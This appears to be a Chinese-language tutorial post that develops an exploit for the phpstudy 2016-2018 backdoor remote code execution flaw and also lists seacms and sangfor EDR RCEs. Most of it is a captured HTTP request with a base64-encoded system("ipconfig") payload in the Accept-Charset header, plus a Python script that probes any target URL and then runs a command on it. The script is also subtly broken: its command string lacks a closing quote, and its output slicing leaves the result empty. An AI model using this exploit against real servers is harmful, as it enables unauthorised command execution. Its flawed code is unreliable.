phpstudy_2016-2018_rce漏洞检验

针对RCE漏洞开发EXP

常见的RCE漏洞:

phpstudy_2016-2018_rce
seacms_6.26-6.28_rce
sangfor_edr_3.2.19_rce

phpstudy_2016-2018_rce漏洞复现

• 对“http://192.168.17.132/phpinfo.php”进行抓包

• 对进行漏洞利用的语句进行base64编码

phpstudy_2016-2018_rce漏洞检验脚本

#http请求
'''
GET /phpinfo.php HTTP/1.1

Host: 192.168.17.134

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.17.134/

Accept-Encoding: gzip,deflate

Accept-Charset: c3lzdGVtKCJpcGNvbmZpZyIpOw==

Accept-Language: en-US,en;q=0.9

Connection: close
'''
import requests
import sys
import base64

try:
    url = sys.argv[1]
except:
    print("[+] Usage: Python *.py http://192.168.17.134/phpinfo.php")
    exit()

print(f"[+] Target: {url}")

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": "c3lzdGVtKCJnbGYiKTs="
}

res = requests.get(url = url,headers= headers) 

result = res.text[:res.text.find("")]

if "glf" in result:
    print(f"[*] Target {url} is VULNERRABLE!")
else:
    print(f"[*] Target {url} is NOT VULNERRABLE!")

cmd = "ipconfig"
cmd = f"system('{cmd});"
cmd = base64.b64encode(cmd.encode()).decode()

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": cmd
}

res = requests.get(url = url,headers= headers) 

result = res.text[:res.text.find("")]

print(result)